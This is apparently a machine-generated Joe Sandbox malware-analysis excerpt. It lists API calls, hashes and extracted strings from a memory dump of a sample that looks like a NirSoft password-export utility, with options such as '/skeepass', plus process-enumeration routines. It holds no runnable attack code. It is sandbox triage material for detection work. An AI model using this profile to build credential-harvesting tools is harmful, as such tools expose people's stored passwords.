                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                              • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                              • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                              • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                              • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                              • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                              • String ID: |A
                                                                                                                                                                                                                              • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                              • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                              • API String ID: 2012295524-70141382
                                                                                                                                                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 667068680-3953557276
                                                                                                                                                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1700100422-0
                                                                                                                                                                                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 552707033-0
                                                                                                                                                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                              • String ID: 4$h
                                                                                                                                                                                                                              • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                                                                                                              • String ID: %%0.%df
                                                                                                                                                                                                                              • API String ID: 3473751417-763548558
                                                                                                                                                                                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                              • String ID: A
                                                                                                                                                                                                                              • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                              • String ID: caption
                                                                                                                                                                                                                              • API String ID: 973020956-4135340389
                                                                                                                                                                                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                              • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                              • String ID: \systemroot
                                                                                                                                                                                                                              • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscpy
                                                                                                                                                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                              • API String ID: 1284135714-318151290
                                                                                                                                                                                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                              • String ID: 0$6
                                                                                                                                                                                                                              • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 290601579-0
                                                                                                                                                                                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
